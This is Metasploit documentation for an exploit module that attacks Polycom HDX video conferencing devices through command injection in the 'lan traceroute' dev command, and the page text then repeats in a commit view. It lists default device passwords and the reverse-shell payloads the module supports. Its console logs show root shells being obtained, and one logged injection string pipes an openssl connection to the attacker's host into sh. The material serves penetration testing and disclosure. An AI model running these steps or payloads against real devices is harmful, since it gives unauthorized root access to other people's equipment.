documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md

Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator`


## Vulnerable Application
Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup)

## Options
### PASSWORD
Although a majority of devices come without a  password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or
the devices.


## Payloads
Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic`

```
Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
```

## Verification Steps

A successful check of the exploit will look like this:
```
msf exploit(polycom) > set RHOST 192.168.0.17
RHOST => 192.168.0.17
msf exploit(polycom) > set LHOSt ens3
LHOSt => ens3
msf exploit(polycom) > set LPORT 3511
LPORT => 3511
msf exploit(polycom) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)

msf exploit(polycom) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(polycom) > set VERBOSE false
VERBOSE => false
msf exploit(polycom) > run

[*] Started reverse TCP double handler on 192.168.0.11:3511
[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vGopPRp0jBxt4J2D;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "vGopPRp0jBxt4J2D\n"
[*] Matching...
[*] A is input...
[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500
[*] 192.168.0.17:23 - Shutting down payload stager listener...

id
uid=0(root) gid=0(root)
whoami
root
```

## Debugging
Setting `VERBOSE` to true should yield an output of.

```
msf exploit(polycom) > set VERBOSE true
VERBOSE => true
rmsf exploit(polycom) > run

[*] Started reverse TCP double handler on 192.168.0.11:3511
[*] 192.168.0.17:23 - Received : !
Polycom Command Shell
XCOM host:    localhost port: 4121
TTY name:     /dev/pts/6
Session type: telnet
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)
2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]
2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]
2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)
2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx
2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered

[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!
[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo WD3QloY3fys6n7dK;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] 192.168.0.17:23 - devcmds
Entering sticky internal commands *ONLY* mode...
lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`
2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`]
2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68
2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0

[*] Reading from socket B
[*] B: "WD3QloY3fys6n7dK\n"
[*] Matching...
[*] A is input...
[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500
[*] 192.168.0.17:23 - Shutting down payload stager listener...

id
uid=0(root) gid=0(root)
whoami
root
```
Create polycom_hdx_traceroute_exec.md 2017-11-15 10:38:53 -05:00			Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator`


			`## Vulnerable Application`
			`Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup)`

			`## Options`
			`### PASSWORD`
			Although a majority of devices come without a password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or
			`the devices.`


			`## Payloads`
			Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic`

			```
			`Compatible Payloads`
			`===================`

			`Name Disclosure Date Rank Description`
			`---- --------------- ---- -----------`
			`cmd/unix/generic normal Unix Command, Generic Command Execution`
			`cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)`
			`cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)`
			`cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)`
			```

			`## Verification Steps`

			`A successful check of the exploit will look like this:`
			```
			`msf exploit(polycom) > set RHOST 192.168.0.17`
			`RHOST => 192.168.0.17`
			`msf exploit(polycom) > set LHOSt ens3`
			`LHOSt => ens3`
			`msf exploit(polycom) > set LPORT 3511`
			`LPORT => 3511`
			`msf exploit(polycom) > show payloads`

			`Compatible Payloads`
			`===================`

			`Name Disclosure Date Rank Description`
			`---- --------------- ---- -----------`
			`cmd/unix/generic normal Unix Command, Generic Command Execution`
			`cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)`
			`cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)`
			`cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)`

			`msf exploit(polycom) > set PAYLOAD cmd/unix/reverse`
			`PAYLOAD => cmd/unix/reverse`
			`msf exploit(polycom) > set VERBOSE false`
			`VERBOSE => false`
			`msf exploit(polycom) > run`

			`[*] Started reverse TCP double handler on 192.168.0.11:3511`
			`[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!`
			`[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874...`
			`[*] Accepted the first client connection...`
			`[*] Accepted the second client connection...`
			`[*] Command: echo vGopPRp0jBxt4J2D;`
			`[*] Writing to socket A`
			`[*] Writing to socket B`
			`[*] Reading from sockets...`
			`[*] Reading from socket B`
			`[*] B: "vGopPRp0jBxt4J2D\n"`
			`[*] Matching...`
			`[*] A is input...`
			`[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500`
			`[*] 192.168.0.17:23 - Shutting down payload stager listener...`

			`id`
			`uid=0(root) gid=0(root)`
			`whoami`
			`root`
			```

			`## Debugging`
			Setting `VERBOSE` to true should yield an output of.

			```
			`msf exploit(polycom) > set VERBOSE true`
			`VERBOSE => true`
			`rmsf exploit(polycom) > run`

			`[*] Started reverse TCP double handler on 192.168.0.11:3511`
			`[*] 192.168.0.17:23 - Received : !`
			`Polycom Command Shell`
			`XCOM host: localhost port: 4121`
			`TTY name: /dev/pts/6`
			`Session type: telnet`
			`2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68]`
			`2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340`
			`2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340)`
			`2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9`
			`2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104]`
			`2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380]`
			`2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6]`
			`2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342)`
			`2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10`
			`2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918`
			`2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx`
			`2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered`

			`[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent!`
			`[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450...`
			`[*] Accepted the first client connection...`
			`[*] Accepted the second client connection...`
			`[*] Command: echo WD3QloY3fys6n7dK;`
			`[*] Writing to socket A`
			`[*] Writing to socket B`
			`[*] Reading from sockets...`
			`[*] 192.168.0.17:23 - devcmds`
			`Entering sticky internal commands ONLY mode...`
			lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873\|sh`
			2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873\|sh`]
			`2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68`
			2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873\|sh` hop_count: 0

			`[*] Reading from socket B`
			`[*] B: "WD3QloY3fys6n7dK\n"`
			`[*] Matching...`
			`[*] A is input...`
			`[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500`
			`[*] 192.168.0.17:23 - Shutting down payload stager listener...`

			`id`
			`uid=0(root) gid=0(root)`
			`whoami`
			`root`
			```